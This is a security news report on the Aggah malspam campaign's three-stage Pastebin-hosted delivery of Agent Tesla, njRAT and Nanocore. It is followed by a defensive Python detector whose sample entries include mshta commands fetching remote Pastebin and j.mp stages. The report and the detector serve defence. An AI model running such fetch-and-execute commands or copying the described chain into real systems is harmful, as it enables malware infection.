Aggah malspam campaign delivers multiple RATs via Pastebin

Security researchers have uncovered an upgraded version of the Aggah malspam campaign, which utilizes multiple Pastebin accounts to distribute several remote access tools (RATs), namely Agent Tesla, njRAT, and Nanocore RAT.

Ongoing since January 2020, the Aggah campaign has been quite prolific recently, with the attackers using their own infrastructure as well as hosting sites such as Pastebin to serve the final RAT payloads.

The attack, which involves three stages, starts with a malicious email that appears legitimate but is vague and offers little to no content. A Microsoft Office document attached to the email contains a VBA macro that downloads the next stage of the infection and executes it on the victim’s computer.

“Once opened, the malicious VBA contacts a shortened "j.mp" URL (redirects to pastebin[.]com) that points to the next stage of the infection. The second stage of the infection (in fact all the subsequent stages) is hosted on Pastebin URLs,” the researchers explained.

“Newer versions of the macro also aim to establish persistence via the Windows registry for the second-stage payload's execution using mshta.”

The second-stage payload configures a malicious scheduled task for another component, then downloads and executes a .NET executable for Windows designed to disable security features and evade detection.

The third-stage payload is a VBScript designed to instrument a .NET-based injector component that activates a RAT payload (the final stage) on the infected host.

The infection/injection process works as follows:

  • The Stage 3 payload VBScript downloads the injector instrumentation script from a Pastebin URL.

  • The injector instrumentation script decompresses the injector binary (a .NET-based DLL) and loads it into memory, ready to be executed via an exported API of the DLL. The RAT payload is then downloaded and decoded.

  • An API of the injector DLL is then called to inject the RAT payload into a specified benign process.

  • The API accepts a benign executable's name (such as "calc.exe"), spawns a new suspended process and uses process-hollowing to inject and activate the RAT payload on the infected endpoint.

At the final stage, the Agent Tesla, njRAT, and Nanocore RAT malware are delivered to the infected computer.
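As an added defensive example (not code from the original report or from the researchers), the following Python scans persistence entries such as registry Run values and scheduled-task actions for the pattern described above: a script host like mshta launching a URL hosted on Pastebin or the j.mp shortener. The sample entries, source labels and paste ids are constructed placeholders, not real indicators from the campaign.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple
from urllib.parse import urlparse

# Script hosts: mshta as named in the report, plus the usual hosts for VBScript stages.
SCRIPT_HOSTS = ("mshta.exe", "mshta", "wscript.exe", "cscript.exe")
# Free hosting named in the report: Pastebin and the Bitly shortener j.mp.
PASTE_DOMAINS = ("pastebin.com", "j.mp", "bit.ly")
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.IGNORECASE)

@dataclass
class Finding:
    source: str   # where the command came from (Run key, scheduled task, ...)
    command: str
    host: str     # script host that would execute the remote content
    domain: str   # paste/shortener domain the URL points at

def _domain(url: str) -> str:
    host = (urlparse(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host

def find_paste_hosted_stages(entries: Iterable[Tuple[str, str]]) -> List[Finding]:
    """Flag persistence entries where a script host launches a URL on a paste
    site or shortener, the second-stage persistence pattern described above."""
    findings = []
    for source, cmd in entries:
        lowered = cmd.lower()
        host = next((h for h in SCRIPT_HOSTS if h in lowered), None)
        if host is None:
            continue
        for url in URL_RE.findall(cmd):
            dom = _domain(url)
            if any(dom == d or dom.endswith("." + d) for d in PASTE_DOMAINS):
                findings.append(Finding(source, cmd, host, dom))
                break
    return findings

# Constructed sample entries (source label, command line); paste ids are placeholders.
SAMPLE_ENTRIES = [
    ("HKCU Run\\Update", 'mshta.exe "https://pastebin.com/raw/PLACEHOLDER1"'),
    ("SchTask\\Updater", "wscript.exe //B C:\\Users\\Public\\stage3.vbs"),  # local, not flagged
    ("HKCU Run\\OneDrive", '"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe" /background'),
    ("SchTask\\SysCheck", "mshta http://j.mp/PLACEHOLDER2"),
]

if __name__ == "__main__":
    for f in find_paste_hosted_stages(SAMPLE_ENTRIES):
        print(f"{f.source}: {f.host} -> {f.domain}")
```

A local script file launched by wscript is deliberately not flagged, so the check targets remotely hosted stages rather than every script-host invocation.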

“The actors behind this campaign are clearly motivated and continue to operate leveraging freely available infrastructure such as Pastebin, Bitly (j[.]mp) and others. We have also observed a steady evolution in their tactics ranging from modularization of their attack chains to antivirus evasion tactics to thwart detections. The fact that these actors continue to distribute a wide variety of malware indicates that they are constantly growing their malware arsenal,” the researchers concluded.